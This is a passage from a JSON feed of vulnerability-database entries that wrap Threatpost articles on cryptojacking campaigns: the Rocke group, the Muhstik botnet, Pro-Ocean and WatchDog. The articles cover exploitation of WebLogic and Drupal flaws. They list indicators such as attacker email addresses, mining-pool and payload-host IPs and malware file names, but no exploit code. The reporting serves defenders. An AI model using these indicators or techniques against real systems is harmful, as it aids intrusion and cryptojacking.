the Adobe ColdFusion platform (CVE-2017-3066).\n\n## Recent Campaigns\n\nAs recently as late July, researchers said they discovered another similar campaign on their Struts 2 honeypot. The honeypot received a wget request (a command for downloading files from the internet) for a file called \u201c0720.bin.\u201d When researchers did some digging and visited the host this file was located on, they discovered that it contained a slew of additional files, including shell scripts and cryptominers.\n\nThose files included an Executable and Linkable (ELF) file called \u201c3307.bin,\u201d a shell script called \u201ca7\u201d that kills a variety of processes related to other cryptomining malware, as well as shell scripts \u201clowerv2.sh\u201d and \u201crootv2.sh,\u201d which attempt to download and execute cryptomining malware.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/08/30151343/talos.png>)\n\nThey also found a file called \u201cconfig.json,\u201d which is a mining config file for open-source Monero miner XMRig. Another file, \u201cPools.txt,\u201d appears to be a config file for XMR-stak, an open-source universal Stratum pool miner that mines Monero, Aeon and more. Both miners have the same mining pool and wallet information.\n\nOther miners in the files include \u201cBashf,\u201d a variant of XMR-stak, and \u201cbashg,\u201d a variant of XMRig.\n\nFinally, Cisco Talos said it found a file dubbed \u201cTermsHost.exe,\u201d a PE 32 Monero miner, which researchers said can be purchased online for $14 and targets malicious actors: \u201cAdvertising for the miner promotes it as offering startup registry key persistence, mining only while idle, and the ability to inject the miner into \u2018Windows processes to bypass firewalls,'\u201d Liebenberg wrote.\n\nThe sample first grabs the config file \u201cxmr.txt\u201d containing the same configuration information as the previous files, from Rocke\u2019s command-and-control (C2) server, and then injects code into notepad.exe, which then proceeds to communicate with the MinerGate pool.\n\n\u201cIntriguingly, this file appears to share some similarities with Cobalt Strike, the popular penetration testing software, which would allow the attacker to have greater control over the infected system,\u201d researchers said.\n\n## Threat Actor\n\nLiebenberg said Cisco Talos was able to discover more about Rocke through several emails associated with the threat actor\u2019s MinerGate Monero wallet (rocke@live.cn and jxci@vip.qq.com): \u201cThe majority of websites registered to Rocke list Jiangxi Province addresses for their registration,\u201d he said. \u201cSome of these websites were for Jiangxi-based businesses, such as belesu[.]com, which sells baby food\u2026 It is possible that the \u2018jx\u2019 in jxci@vip.qq.com stands for Jiangxi. Therefore, we assess with high confidence that Rocke operates from Jiangxi Province.\u201d\n\nThe payload is similar to one used by the [Iron Cybercrime Group](<https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/>), Cisco Talos said: \u201cBoth Iron and Rocke\u2019s malware behave similarly, and reach out to similar infrastructure,\u201d they said. \u201cSo, while we can assess with high confidence that the payloads share some code base, we are still unsure of the exact relationship between Rocke and Iron Cybercrime Group.\u201d\n\nLiebenberg pointed to cryptomining malware as increasing in popularity, with the Rocke threat actor an example of varying methods to download and execute various malware.\n\n\u201cDespite the volatility in the value of various cryptocurrencies, the trend of illicit cryptocurrency mining activity among cybercriminals shows no signs of abating,\u201d they said. \u201cRocke\u2019s various campaigns show the variety of infection vectors, malware, and infrastructure that these criminals will employ to achieve their goals.\u201d\n", "modified": "2018-08-30T20:35:39", "published": "2018-08-30T20:35:39", "id": "THREATPOST:E43EB029B562B5665C8385E16145288A", "href": "https://threatpost.com/new-threat-actor-rocke-a-rising-monero-cryptomining-menace/137090/", "type": "threatpost", "title": "New Threat Actor \u2018Rocke\u2019: A Rising Monero Cryptomining Menace", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-11T11:47:52", "bulletinFamily": "info", "cvelist": ["CVE-2017-10271", "CVE-2019-2725"], "description": "Malicious activity exploiting the recently disclosed Oracle WebLogic critical deserialization vulnerability (CVE-2019-2725) is surging. Even though there\u2019s a patch, tens of thousands of vulnerable machines represent an irresistible target for hackers, according to Unit 42 researchers at Palo Alto Networks \u2013 especially since the bug is \u201ctrivial\u201d to exploit.\n\nOracle WebLogic Server is a popular application server used in building and deploying enterprise Java EE applications. Oracle released an out-of-band patch on April 26, 2019 \u2013 though exploitation for what was then a zero-day had already begun, researchers said. Quickly thereafter, attacks distributing a never-before-seen [ransomware variant called \u201cSodinokibi\u201d emerged](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>); and then attacks [spreading a new variant](<https://threatpost.com/muhstik-botnet-variant-targets-just-patched-oracle-weblogic-flaw/144253/>) of the Muhstik botnet, which is used to launch distributed-denial-of-service (DDoS) and cryptojacking attacks.\n\nNow, other attacks are starting to snowball, with no sign of abating.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cOnce the vulnerability was made public with the release of the patch, numerous instances of proof-of-concept (PoC) code exploiting the vulnerability were released,\u201d Unit 42 researchers said, in a posting [late last week](<https://unit42.paloaltonetworks.com/attackers-increasingly-targeting-oracle-weblogic-server-vulnerability-for-xmrig-and-ransomware/>). \u201cPreliminary indicators reveal over 600 exploitation attempts targeting CVE-2019-2725 on Palo Alto Networks soak sites and we expect this number to increase rapidly.\u201d\n\nThey added that a scan showed more than 41,000 publicly accessible WebLogic instances in the wild.\n\n\u201cWith this many publicly available WebLogic instances on the internet, as well as an unknown number of private instances in enterprise environments, we expect an escalation of exploitation attempts in the coming days and weeks,\u201d according to the researchers.\n\nThe critical flaw, which has a CVSS score of 9.8, is a remote code execution bug that is remotely exploitable without authentication. Impacted are versions 10.3.6.0.0 and 12.1.3.0.0 of the product. Palo Alto pointed out that exploitation does not require any interaction from the user \u2013 a remote, unauthenticated user can send an HTTP request containing a crafted SOAP payload and obtain remote code execution trivially.\n\n\u201cPeople are on the lookout for critical vulnerabilities and seek to jump on them quickly so they can exploit them before patches are applied,\u201d Ryan Olson, vice president of threat intelligence for Unit 42 told Threatpost. \u201cAs we outline in the blog, this isn\u2019t a difficult vulnerability to exploit, particularly given it\u2019s similarity to a previous vulnerability from 2017.\u201d\n\nThat previous vulnerability (CVE-2017-10271) allows a remote, unauthenticated attacker to pass Java-class objects with arbitrary contents, allowing for remote code-execution and in many ways provides a blueprint for the new flaw, according to the researchers.\n\n\u201cThis reinforces the importance of good testing for variant vulnerabilities by vendors when patching vulnerabilities,\u201d Olson told Threatpost.\n\n## XMRig and GandCrab\n\nUnit 42 researchers have observed a wide variety of payloads in addition to Muhstik and Sodinokibi, such as a PowerShell loader that fetches the open-source Monero cryptominer known as XMRig. In addition to dropping the miner, it terminates any legitimate Oracle update services that would patch the underlying WebLogic vulnerability, and establishes persistence by copying itself and creating a scheduled task that masquerades as the Oracle update service.\n\nOther attacks are pushing ransomware to infected victims, including [the infamous GandCrab](<https://threatpost.com/gandcrab-decryptor-ransomware/141973/>).\n\n\u201cAt this point, it appears that both ransomware and cryptomining have settled into a stable pattern in terms of use by cybercriminals,\u201d Olson told Threatpost.\n\nThe popularity of WebLogic Server, combined with its tendency to be deployed in business-critical environments, creates an attractive target set for cybercriminals; and exacerbating matters is the fact that there could be \u201can unknown number of private instances in enterprise environments,\u201d Unit 42 researchers said. There are not directly exposed to the web, but an attacker that\u2019s able to penetrate a corporate network could easily uncover them.\n\n\u201cThese would essentially be internal network deployments,\u201d Olson said. \u201cThe attacks wouldn\u2019t be different, but the attackers would have to find a means to launch the attack so that it gets into the internal network.\u201d\n\nBusinesses should make every effort to patch, and patch quickly, Olson noted.\n\n\u201cThis is a reminder that the window for exploitation has narrowed and that enterprises need to be able to deploy critical patches like this in a matter of hours and days, not weeks and months,\u201d he told Threatpost.\n", "modified": "2019-05-06T20:04:55", "published": "2019-05-06T20:04:55", "id": "THREATPOST:760547BA8017A91CB7219FE7629E28B3", "href": "https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/", "type": "threatpost", "title": "Oracle WebLogic Exploit-fest Continues with GandCrab Ransomware, XMRig", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-04-25T05:50:10", "bulletinFamily": "info", "cvelist": ["CVE-2017-10271", "CVE-2018-7600"], "description": "Researchers are warning a recently discovered and highly critical vulnerability found in Drupal\u2019s CMS platform is now being actively exploited by hackers who are using it to install cryptocurrency miners and to launch DDoS attacks via compromised systems. At the time of the disclosure, last month, researchers said they were not aware of any public exploits.\n\nNow Netlab 360 researchers say they have identified a botnet, dubbed Muhstik, that is taking advantage of the Drupal bug. They said multiple scans on infected Drupal instances reveal[ attackers](<https://blog.netlab.360.com/botnet-muhstik-is-actively-exploiting-drupal-cve-2018-7600-in-a-worm-style-en/>) are exploiting the vulnerability by accessing a URL and then injecting exploit code. The technique allows adversaries to execute commands on targeted servers running Drupal.\n\nThe Muhstik botnet exploits Drupal vulnerability ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)), impacting versions 6,7, and 8 of Drupal\u2019s CMS platform. \u201cThis potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d warned MITRE\u2019s Common Vulnerabilities and Exposures bulletin on March 28.\n\nDrupal, which also released a patch for the vulnerability in [March](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>), warned that over one million sites running Drupal are impacted. Unprivileged and untrusted attackers could also modify or delete data hosted on affected CMS platforms, Drupal said.\n\nAfter further investigations, Netlab researchers said that it believes at least three groups of malware were exploiting the vulnerability.\n\n\u201cWe noticed one of them has worm-propagation behavior. After investigation, we believe this botnet has been active for quit a time. We name it Muhstik, for this keyword keeps popup in its binary file name and the communication IRC channel,\u201d wrote Netlab 360 researchers.\n\nAccording to Netlab, Muhstik is a variant of Tsunami, a malware strain that creates botnets with infected Linux servers and Linux-based IoT devices.\n\nMuhstik has the capability to install two coinminers \u2013 XMRig (XMR) and CGMiner \u2013 to mine the open-source, peer-to-peer Dash cryptocurrency, according to Netlab.\n\nResearchers say the botnet uses the open-source XMRig utility to mine cryptocurrency with a self-built mining pool (47.135.208.145:4871). Meanwhile, it uses popular mining software CGMiner to to dig cryptocurrency coins using multiple mining tools (with username reborn.D3), they said.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/04/23162156/Botnet.png>)\n\nIn addition Netlab researchers said they intercepted multiple DDoS attack instructions targeting the IP address 46[.]243[.]189[.]102.\n\nMuhstik relies on 11 command and control domains and IP addresses, and the attackers also uses the IRC communication protocol to invoke commands for the botnet: \u201cWe observed multiple IRC Channels, all starting with \u2018muhstik,'\u201dsaid Netlab researchers in a report. \u201cAt present, we can not confirm which specific channels are open on which C2 server. This is due to the characteristics of the IRC protocol itself. Only when we receive a communication instruction from the corresponding channel can we confirm it\u2019s present.\u201d\n\nMuhdtik also has capabilities to scan for vulnerable server apps using the the aiox86 scanning module. This module \u201cscans TCP port 80, 8080, 7001, 2004, and tries varieties of different payloads on each port,\u201d according to NetLab.\n\nGreyNoise Intelligence said in a tweet that it detected the botnet to be exploiting a vulnerability (CVE-2017-10271) in Oracle WebLogic Server as well, indicating that Muhstik is exploiting vulnerabilities in other server applications.\n\n> UPDATE: there is a 95% overlap between the IPs scanning for the previously reported [#drupalgeddon](<https://twitter.com/hashtag/drupalgeddon?src=hash&ref_src=twsrc%5Etfw>) vulnerability and the Oracle CVE-2017-10271 vulnerability.\n> \n> \u2014 GreyNoise Intelligence (@GreyNoiseIO) [April 18, 2018](<https://twitter.com/GreyNoiseIO/status/986458691787517952?ref_src=twsrc%5Etfw>)\n\nTroy Mursch, founder of Bad Packets Report, told Threatpost that given the criticality of the exploit and the repurcussions once it\u2019s used, \u201cthe race is on to find vulnerable Drupal installations.\u201d\n\n\u201cI recommend affected users update to Drupal 7.58 or 8.5.1 as soon as possible. To note as well, updating to the patched version doesn\u2019t retroactively \u2018unhack\u2019 your site. I recommend website operators check their installation (server) for any of the IoCs mentioned in the 360 Netlab report after completing the update,\u201d he said.\n", "modified": "2018-04-23T22:13:25", "published": "2018-04-23T22:13:25", "id": "THREATPOST:5633BBF7C54D598EB76A7B3781EFD2CB", "href": "https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/", "type": "threatpost", "title": "Muhstik Botnet Exploits Highly Critical Drupal Bug", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-01-28T21:55:45", "bulletinFamily": "info", "cvelist": ["CVE-2016-3088", "CVE-2017-10271", "CVE-2018-2893"], "description": "Researchers have identified an updated malware variant used by the cybercrime gang Rocke Group that targets cloud infrastructures with crypto-jacking attacks.\n\nThe malware is called Pro-Ocean, which was first discovered in 2019, and has now been beefed-up with \u201cworm\u201d capabilities and rootkit detection-evasion features.\n\n\u201cThis malware is an example that demonstrates that cloud providers\u2019 agent-based security solutions may not be enough to prevent evasive malware targeted at public cloud infrastructure,\u201d said Aviv Sasson with Palo Alto Networks [on Thursday](<https://unit42.paloaltonetworks.com/pro-ocean-rocke-groups-new-cryptojacking-malware/>). \u201cAs we saw, this sample has the capability to delete some cloud providers\u2019 agents and evade their detection.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nSince [its discovery in 2018](<https://threatpost.com/new-threat-actor-rocke-a-rising-monero-cryptomining-menace/137090/>), the Rocke Group has widened its [targeting of cloud applications](<https://threatpost.com/cryptomining-malware-uninstalls-cloud-security-products/140959/>) \u2013 including Apache ActiveMQ, Oracle WebLogic and open-source data structure store Redis \u2013 for mining Monero. Researchers say that since these attacks initially broke out, many cybersecurity companies have kept Pro-Ocean on their radar. Rocke Group\u2019s latest update aims to sidestep these detection and mitigation efforts.\n\n## **Pro-Ocean Malware**\n\nPro-Ocean uses a variety of known vulnerabilities to target cloud applications. These include a [critical flaw in Apache ActiveMQ](<https://nvd.nist.gov/vuln/detail/CVE-2016-3088>) (CVE-2016-3088) and [a high-severity vulnerability](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>) in Oracle WebLogic (CVE-2017-10271). The malware has also been spotted targeting unsecure instances of Redis.\n\nOnce downloaded, the malware attempts to remove other malware and cryptominers, including [Luoxk](<https://blog.netlab.360.com/malicious-campaign-luoxk-is-actively-exploiting-cve-2018-2893/>), [BillGates](<https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/bill-gates-botnet-threat-advisory.pdf>), [XMRig](<https://threatpost.com/new-cryptominer-distributes-xmrig-in-aggressive-attacks/132027/>) and [Hashfish](<https://virus-removal-guide.net/34710-is-the-hashfish-exe-file-legal-how-to-remove-hashfish-exe-trojan-coinminer/>). It then kills any processes using the CPU heavily, so that its XMRig miner can utilize 100 percent of the CPU juice needed to sow Monero.\n\nThe malware is made up of four components: A rootkit module that installs a rootkit and other various malicious services; a mining module that runs the XMRig miner; a Watchdog module that executes two Bash scripts (these check that the malware is running and search any processes using CPU heavily); and an infection module that contains \u201cworm\u201d capabilities.\n\n## **New Features**\n\nThe latter \u201cworm\u201d feature is a new add for Pro-Ocean, which previously only infected victims manually. The malware now uses a Python infection script to retrieve the public IP address of the victim\u2019s machine. It does so by accessing an online service with the address \u201cident.me,\u201d which scopes out IP addresses for various web servers. Then, the script tries to infect all the machines in the same 16-bit subnet (e.g. 10.0.X.X).\n\n\u201cIt does this by blindly executing public exploits one after the other in the hope of finding unpatched software it can exploit,\u201d said Sasson.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/01/28143636/word-image-4.png>)\n\nPro-Ocean\u2019s modular structure. Credit: Palo Alto Networks\n\nOther threat groups have previously adopted worm-like functionality into their Monero-chugging malware. TeamTNT\u2019s cryptomining worm, for instance, [was found spreading through](<https://threatpost.com/aws-cryptojacking-worm-cloud/158427/>) the Amazon Web Services (AWS) cloud and collecting credentials in August.\n\nThe Pro-Ocean malware has also added mew rootkit capabilities that cloak its malicious activity.\n\nThese updated features exist in [Libprocesshider](<https://github.com/gianlucaborello/libprocesshider>), a library for hiding processes used by the malware. This library was utilized by previous versions of Pro-Ocean \u2013 however, in the new version, the developer of the code has added several new code snippets to the library for further functionalities.\n\nFor example, before calling the libc function open (libc is a library of standard functions that can be used by all C programs), a malicious function determines whether the file needs to be hidden to obfuscate malicious activities.\n\n\u201cIf it determines that the file needs to be hidden, the malicious function will return a \u2018No such file or directory\u2019 error, as if the file in question does not exist,\u201d said Sasson.\n\nResearchers said they believe that the Rocke Group will continue to actively update its malware, particularly as the [cloud grows as a lucrative target for attackers](<https://threatpost.com/cloud-attacks-bypass-mfa-feds/163056/>).\n\n\u201cCryptojacking malware targeting the cloud is evolving as attackers understand the potential of that environment to mine for crypto coins. We previously saw simpler attacks by the Rocke Group, but it seems this group presents an ongoing, growing threat. This cloud-targeted malware is not something ordinary since it has worm and rootkit capabilities. We can assume that the growing trend of sophisticated attacks on the cloud will continue.\u201d\n\n**Download our exclusive **[**FREE Threatpost Insider eBook**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=FEATURE&utm_medium=FEATURE&utm_campaign=Nov_eBook>) [_**Healthcare Security Woes Balloon in a Covid-Era World**_](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_eBook>)** , sponsored by ZeroNorth, to learn more about what these security risks mean for hospitals at the day-to-day level and how healthcare security teams can implement best practices to protect providers and patients. Get the whole story and **[**DOWNLOAD the eBook now**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_eBook>)**\u2013 on us!**\n", "modified": "2021-01-28T20:06:57", "published": "2021-01-28T20:06:57", "id": "THREATPOST:D3FA06D667A0B326C1598C8BCD106E7D", "href": "https://threatpost.com/rocke-groups-malware-now-has-worm-capabilities/163463/", "type": "threatpost", "title": "Rocke Group\u2019s Malware Now Has Worm Capabilities", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-08T11:51:46", "bulletinFamily": "info", "cvelist": ["CVE-2017-10271", "CVE-2019-2725", "CVE-2020-0688"], "description": "UPDATE\n\nA variant of the Muhstik botnet has been uncovered in the wild, exploiting a recently-disclosed, dangerous vulnerability in Oracle WebLogic servers.\n\nThe newfound samples of Muhstik are targeting the [recently-patched CVE-2019-2725](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>) in WebLogic servers, and then launching distributed-denial-of-service (DDoS) and cryptojacking attacks with the aim of making money for the attacker behind the botnet, researchers said.\n\n\u201cFrom the timeline, we can see that the developer of Muhstik watches aggressively for new Linux service vulnerability exploits and takes immediate action to [incorporate] exploits against them into the botnet,\u201d Cong Zheng and Yanhui Jia, researchers with Palo Alto Network\u2019s Unit 42 team, said in a [Tuesday analysis](<https://unit42.paloaltonetworks.com/muhstik-botnet-exploits-the-latest-weblogic-vulnerability-for-cryptomining-and-ddos-attacks/>). \u201cThis makes sense, because the faster the botnet includes the new exploits, the greater chance of successfully using the vulnerability to harvest more bots before systems are patched.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nOracle WebLogic is a popular server used for building and deploying enterprise applications. The server\u2019s flaw ([CVE-2019-2725](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html>)), meanwhile, has a CVSS score of 9.8 and is a remote code-execution (RCE) bug that is exploitable without authentication. Oracle patched the flaw on April 26.\n\nHowever, researchers first observed exploit traffic for the WebLogic vulnerability coming from three new Muhstik samples on April 28. Muhstik, which has been around since March 2018 and has wormlike self-propagating capabilities, is known to compromise Linux servers and IoT devices, and then launch cryptocurrency mining software and DDoS attacks.\n\nThey saw the exploit traffic being sent from the IP address 165.227.78[.]159, which was transmitting one shell command, to download a PHP webshell.\n\nInterestingly, that IP address (165.227.78[.]159) has previously been used by the Muhstik botnet as a mere reporting server to collect information on bots \u2013 but now, the IP address appears to also be used as a payload host server.\n\nThe discovery shows that new samples of the Muhstik botnet continue to sniff out ripe exploits. The botnet had previously targeted an earlier WebLogic vulnerability ([CVE-2017-10271](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10271>)), as well as WordPress and [Drupal vulnerabilities.](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>)\n\nUnit 42 researchers told Threatpost that they didn\u2019t have further information on the number of servers impacted.\n\n## Oracle WebLogic\n\nThe latest Oracle WebLogic flaw, which impacts versions 10.3.6 and 12.1.3 of the server, is one such ripe target.\n\nThe flaw could allow an attacker to send a request to a WebLogic server, which would then reach out to a malicious host to complete the request, opening up the impacted server to an remote code-execution attack.\n\nOracle for its part is urging users to update as soon as possible. \u201cDue to the severity of this vulnerability, Oracle recommends that this Security Alert be applied as soon as possible,\u201d Eric Maurice, director of security assurance at Oracle, said in a [recent post](<https://blogs.oracle.com/security/security-alert-cve-2019-2725-released>) about the vulnerability.\n\nOracle didn\u2019t respond to a request for further comment from Threatpost.\n\nHowever, servers that haven\u2019t yet updated are being targeted by several other bad actors, including ones spreading a new [ransomware variant](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>) uncovered this week called \u201cSodinokibi.\u201d That ransomware first came onto researchers\u2019 radar on April 25 (the day before a patch was released), after attackers attempted to make an HTTP connection with vulnerable Oracle WebLogic servers.\n\nResearchers for their part warn of a slew of scans checking for the Oracle WebLogic vulnerability, and urge users to update their devices as soon as possible.\n\nhttps://twitter.com/bad_packets/status/1122356384849248258\n\nWhen it comes to Muhstik, Unit 42 researchers said that adding this latest exploit to the botnet\u2019s toolkit will increase the number of systems it can infect.\n\n\u201cThe Oracle WebLogic wls9-async RCE vulnerability is now being used by Muhstik botnet in the wild and there is a great possibility that it will be exploited by other malware families in the future,\u201d they said. \u201cUnder the pressure of racing with botnets, both service vendors and users should address new vulnerabilities by releasing patches and installing them respectively.\u201d\n\n_This article was updated on May 2 at 8 am ET to reflect Unit 42 comments._\n", "modified": "2019-05-01T14:11:11", "published": "2019-05-01T14:11:11", "id": "THREATPOST:420EE567E806D93092741D7BB375AC57", "href": "https://threatpost.com/muhstik-botnet-variant-targets-just-patched-oracle-weblogic-flaw/144253/", "type": "threatpost", "title": "Muhstik Botnet Variant Targets Just-Patched Oracle WebLogic Flaw", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-02-17T21:39:31", "bulletinFamily": "info", "cvelist": ["CVE-2014-3120", "CVE-2015-1427", "CVE-2017-10271"], "description": "Cryptocurrency-mining malware, called WatchDog, has been running under the radar for more than two years \u2013 in what researchers call one of the largest and longest-lasting Monero cryptojacking attacks to date.\n\n[](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>)\n\nClick to Register\n\nThe attack is still in operation as of this writing \u2013 and due to the size and scope of the infrastructure, it will be difficult to fully contain, researchers told Threatpost. Thus far, attackers have hijacked at least 476 Windows and Linux devices, in order to abuse their system resources for mining Monero cryptocurrency.\n\nRight now, the attackers behind this campaign are sticking to cryptojacking \u2013 but researchers warn that it is \u201chighly likely\u201d they could find identity and access management (IAM) data on previously-compromised cloud systems, due to the root and administrative access that\u2019s acquired during the malware implantation. This could open the door for future \u2013 and more dangerous \u2013 attacks.\n\n\u201cIt is clear that the WatchDog operators are skilled coders and have enjoyed a relative lack of attention regarding their mining operations,\u201d said researchers with Palo Alto Networks [on Wednesday](<https://unit42.paloaltonetworks.com/watchdog-cryptojacking/>). \u201cWhile there is currently no indication of additional cloud compromising activity at present (i.e. the capturing of cloud platform identity and access management credentials, access ID or keys), there could be potential for further cloud account compromise.\u201d\n\n## **How Much Money Does Cryptomining Malware Make? **\n\nThe attack is a [prime example of cryptojacking](<https://threatpost.com/cryptojacking-attack-found-on-los-angeles-times-website/130041/>), which is when attackers leverage malicious cryptomining for financial profit. They do so by hacking into devices to install software, which then uses the devices\u2019 power and resources to mine for cryptocurrencies or to steal cryptocurrency wallets owned by the victims.\n\nSince it launched on Jan. 27, 2019, the WatchDog mining operation has collected at least 209 Monero cryptocurrency coins (XMR) \u2013 which is currently valued at $32,056. While this figure appears to be relatively low, the important piece of cryptojacking operations is not the immediate market price, but the total XMR mined, Nathaniel Quist, senior cloud threat researcher for Unit 42 at Palo Alto Networks, told Threatpost.\n\nAt the time of writing the research, the market price for Monero was $153. But, just within the last 24 hours, the market price of XMR has soared to $254, Quist explained \u2013 so as of Wednesday, WatchDog has actually collected $53,086.\n\n\u201cIn the past, we have seen dramatic swings in cryptocurrency valuations,\u201d Quist told Threatpost. \u201cDepending upon the market price over the next months, we could see cryptocurrency market prices touch the record highs that were seen back in early 2018, where Monero was valued at $469. If that were the case, WatchDog could increase its value total to $98,021 without mining another coin, making it a very profitable mining operation.\u201d\n\n## **WatchDog Malware: Go Binaries Drive Functionality**\n\nResearchers said, the WatchDog mining malware is composed of a three-part Go Language binary set and a bash or PowerShell script file. Go, an open-source programming language, has previously been utilized by various cybercriminals for various cryptojacking attacks, [including TeamTNT](<https://threatpost.com/blackt-cryptojacker-teamtnt/159853/>) and [the developers of ElectroRAT](<https://threatpost.com/electrorat-drains-cryptocurrency-wallet-funds-of-thousands/162705/>).\n\nWatchDog\u2019s Go binaries each perform a specific functionality \u2013 including one that emulates the Linux watchdog daemon functionality (hence the name of the malware, WatchDog) by ensuring that the mining process does not overload or stop unexpectedly. The watchdog daemon\u2019s functionality is to open the device and provide a necessary refresh to keep the system from resetting. For example, it can test process table space, memory usage and running processes.\n\n\u201cWatchDog\u2019s usage of Go binaries allows it to perform the stated operations across different operating systems using the same binaries\u2026 as long as the Go Language platform is installed on the target system,\u201d said researchers.\n\nThe Go binaries include a network scanner and exploitation binary (networkmanager), a process monitoring binary (phpguard), and a version of the malicious XMRig cryptomining software (phpupdate).\n\n## **The WatchDog Cryptojacking Campaign: Windows and Linux OS Under Attack**\n\nThe initial attack vector stems from the networkmanager binary. When the binary identifies a vulnerable target, it attempts to compromise that identified system using a robust set of built-in application exploits.\n\nSpecifically, networkmanager comes loaded with 33 exploits, 32 individual remote code execution (RCE) functions and several shell grab functions. For instance, it scans for applications such as Elasticsearch servers that are vulnerable to CVE-2015-1427 and CVE-2014-3120 and Oracle WebLogic Servers vulnerable to CVE-2017-10271.\n\nFor context, this is a significant amount of exploits when compared to other miners \u2013 [such as the Smominru cryptocurrency miner](<https://threatpost.com/massive-smominru-cryptocurrency-botnet-rakes-in-millions/129726/>), which operated from 2017 to 2018 and collected nearly 9,000 XMR, said Quist. Unlike Smominru\u2019s two exploits, WatchDog\u2019s numerous exploits and RCE functions \u201cmake it better at compromising exposed systems,\u201d he told Threatpost.\n\n## **WatchDog Compared to Graboid Cryptomining Malware**\n\nOf note, WatchDog is stealthier than other cryptomining malware, such as the wormable [Monero mining malware Graboid](<https://threatpost.com/docker-containers-graboid-crypto-worm/149235/>). Discovered last year, Graboid was the largest known mining operation to date in terms of the total number of active systems.\n\nDuring the time of its operation, Graboid consisted of at least 2,000 exposed and compromised Docker Daemon APIs systems, and researchers said the malware could have also achieved \u201chigher processing speeds\u201d due to the configuration script utilizing all available container central processing units (CPUs).\n\nHowever, Graboid was only known to operate for up to three months before its Docker Hub images were removed. That\u2019s because the malware relied on a third-party (Docker Hub) to host its malicious payload \u2013 whereas WatchDog does not, allowing it to have remained active for more than two years, said researchers.\n\nIn fact, WatchDog has a fairly extensive infrastructure behind its mining operations, with researchers mapping out 18 root IP endpoints and seven malicious domains, which serve at least 125 malicious URL addresses used to download its toolset.\n\n## **Cryptojacking: A Cyberattack on the Rise**\n\nWatchDog comes as the value of cryptocurrency has exploded, making cryptojacking a lucrative type of financial attack for cybercriminals. The XMR market value follows the cryptocurrency prices of Bitcoin \u2013 which as of Wednesday set a record-high topping $51,000.\n\nXMR has subsequently increased in value from $153 on February 9 to $254 on Wednesday \u2013 approaching its highest-recorded value of $469.79 (set in January 2018), Quist told Threatpost.\n\n\u201cCybercriminals are watching the market value of XMR,\u201d Quist told Threatpost. \u201cOver the last six months, Unit 42 researchers have seen a 40 percent increase in network traffic to public mining pools, which indicates that more mining operations are taking place. The trend of more XMR mining operations appears to be following the increasing market value price of XMR.\u201d\n\nThis week, researchers with Kaspersky also found that distributed denial-of-service (DDoS) attacks dropped significantly at the end of 2020, down 31 percent in the fourth quarter, as cybercriminals switch their efforts to cryptomining. [According to the analysis this week](<https://threatpost.com/ddos-attacks-q4-cryptomining-resurgence/163998/>), cybercriminals began repurposing infected devices for cryptomining in response to rising cryptocurrency values.\n\nOne such [recently discovered malware](<https://threatpost.com/new-malware-hijacks-kubernetes-clusters-to-mine-monero/163629/>), dubbed Hildegard, was found being leveraged by the TeamTNT threat group to target Kubernetes clusters with cryptojacking attacks. In January, [researchers also identified an updated malware variant](<https://threatpost.com/rocke-groups-malware-now-has-worm-capabilities/163463/>) used by the cybercrime gang Rocke Group that targets cloud infrastructures with crypto-jacking attacks. And, in January, [researchers dug up new discoveries](<https://threatpost.com/sql-server-malware-tied-to-iranian-software-firm-researchers-allege/163230/>) surrounding a cryptomining operation, called MrbMiner, which was downloading a cryptominer on thousands of internet-facing SQL servers.\n\n### _Is your small- to medium-sized business an easy mark for attackers?_\n\n**Threatpost WEBINAR:** _ Save your spot for __\u201c**15 Cybersecurity Pitfalls and Fixes for SMBs**__,\u201d a _[**_FREE Threatpost webinar_**](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>)** _on Feb. 24 at 2 p.m. ET._**_ Cybercriminals count on you making these mistakes, but our experts will help you lock down your small- to mid-sized business like it was a Fortune 100. _[_Register NOW_](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>)_ for this _**_LIVE_****_ _**_webinar on Wed., Feb. 